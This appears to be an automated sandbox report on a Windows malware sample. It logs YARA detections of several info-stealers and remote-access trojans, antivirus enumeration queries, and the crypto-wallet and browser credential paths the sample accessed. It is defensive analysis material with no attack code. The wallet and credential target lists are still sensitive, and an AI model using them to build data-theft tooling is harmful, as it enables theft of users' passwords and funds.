Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe

Code function: 4_2_0013CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

4_2_0013CBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00FB65E0 LookupAccountNameA,

7_2_00FB65E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00FF2517 GetTimeZoneInformation,

7_2_00FF2517

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 7.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EUONBTH0X1WAZ900JF4PYRKDM.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2264398494.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2341932684.0000000000FB1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4519656508.0000000000FB1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2679341193.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2301189686.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BrowserPasswordDump

Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: DbCMTMgeJo.exe PID: 3812, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.c153ad0ce0.exe.4179550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.c153ad0ce0.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.2747691872.0000000000D52000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2984332143.0000000004179000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000003.00000003.2238846734.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2285594803.0000000000D21000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe PID: 6056, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.1c580000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected XWorm

Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.2310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.211131e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.64ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6404, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: DbCMTMgeJo.exe, 00000000.00000003.2139361042.000000000171D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: DbCMTMgeJo.exe, 00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: DbCMTMgeJo.exe	String found in binary or memory: llets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\
Source: DbCMTMgeJo.exe, 00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: DbCMTMgeJo.exe, 00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: DbCMTMgeJo.exe, 00000000.00000003.2122750159.00000000016F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: DbCMTMgeJo.exe, 00000000.00000003.2139361042.000000000171D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: DbCMTMgeJo.exe, 00000000.00000003.2122311529.0000000001764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \MultiDoge\
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: DbCMTMgeJo.exe, 00000000.00000003.2122907785.000000000175B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":2D
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
